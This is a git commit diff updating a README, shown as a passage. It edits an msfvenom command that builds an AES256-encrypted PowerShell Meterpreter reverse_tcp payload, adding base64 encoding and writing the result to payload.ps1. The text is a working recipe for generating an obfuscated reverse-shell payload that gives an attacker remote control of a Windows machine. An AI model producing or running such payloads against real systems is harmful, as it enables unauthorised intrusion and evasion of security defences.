Update README.md

This commit is contained in:
2026-06-13 04:00:00 +00:00
parent d0b4e229cf
commit 17d1484d47
+2 -1
View File
@@ -45,7 +45,8 @@ msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp \
--encrypt aes256 \
--encrypt-key "`openssl rand -hex 16`" \
--encrypt-iv "`openssl rand -hex 8`" \
-f powershell -o file.ps1
-e cmd/powershell_base64 \
-f psh -o payload.ps1
```
## Usage
### Short Help